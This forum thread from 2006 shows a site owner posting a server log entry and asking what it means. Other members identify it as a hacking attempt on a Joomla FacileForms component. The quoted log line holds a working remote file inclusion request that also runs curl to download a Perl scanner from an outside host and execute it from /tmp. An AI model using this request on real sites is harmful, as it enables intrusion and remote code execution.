Tycoon Talk
Become a Big fish!
The number 1 forum for online business!
Post topics, ask questions, share your knowledge.
Tycoon Talk is part of Freelancer.com - find skilled workers online at a fraction of the cost.

General Discussions


You are currently viewing our General Discussions as a guest. Please register to participate.
Login



Reply
Found this in my logs
Old 11-13-2006, 06:47 PM Found this in my logs
Average Talker

Posts: 18
Trades: 0
Does anybody know what this person was trying to do?

I don't have anything called facileorms on my site.

Thanks in advance for your input.

Quote:
[Mon Nov 13 16:26:54 2006] [error] [client 81.219.60.10] request failed: erroneous characters after protocol string: GET /CMS/components/com_facileforms/facileforms.frame.php?ff_compath=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://necazul.xhost.ro/altele/scan.pl;perl%20/tmp/unix ? HTTP/1.0
kommissar is offline
Reply With Quote
View Public Profile
 
 
Register now for full access!
Old 11-14-2006, 04:19 PM Re: Found this in my logs
Talk2Me's Avatar
Ultra Talker

Posts: 269
Trades: 0
I'm sorry but I find it really hard to figure out that code.
__________________

Please login or register to view this content. Registration is FREE


Please login or register to view this content. Registration is FREE


Please login or register to view this content. Registration is FREE
Talk2Me is offline
Reply With Quote
View Public Profile
 
Old 11-14-2006, 04:55 PM Re: Found this in my logs
ADAM Web Design's Avatar
Canadastaninianite

Posts: 5,935
Name: Adam for web page design, not program
Location: Toronto, Ontario, Canada
Trades: 0
I haven't seen that before, but I see similar types of requests in my logs from time to time. They're usually hack attempts. Based on the ff_compath querystring, I'd say that's probably one of them.

I had 1200-someodd of them happen in an hour last year. Turned out it was a company contracted by a bank to do a "security audit" before issuing a client a merchant account.
__________________

Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
(my blog)


Please login or register to view this content. Registration is FREE
(with proof)
ADAM Web Design is offline
Reply With Quote
View Public Profile Visit ADAM Web Design's homepage!
 
Old 11-14-2006, 06:50 PM Re: Found this in my logs
vangogh's Avatar
Post Impressionist

Latest Blog Post:
Why Responsive Design?
Posts: 10,815
Name: Steven Bradley
Location: Boulder, Colorado
Trades: 0
Looks like a hacking attempt. A quick search on Google is showing that ff_compath has to do with Joomla. I think it's a variable that's used and it looks like the person was trying set that variable equal to what's in the file tool25.txt on xargonu.evonet.ro

Looks like they might have been trying to use a perl file on a different domain to run some kind of scan based on the file name.

The domains are Romanian (.ro)

All just guessing on my part.
__________________
l Search Engine Friendly Web Design |
Please login or register to view this content. Registration is FREE

l Tips On Marketing, SEO, Design, and Development |
Please login or register to view this content. Registration is FREE

l
Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
vangogh is offline
Reply With Quote
View Public Profile Visit vangogh's homepage!
 
Reply     « Reply to Found this in my logs
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off





   
RSS Feed  Feeds: RSS   JS   XML
RSS Feed  Feeds for this forum: RSS   JS   XML



Page generated in 0.78857 seconds with 12 queries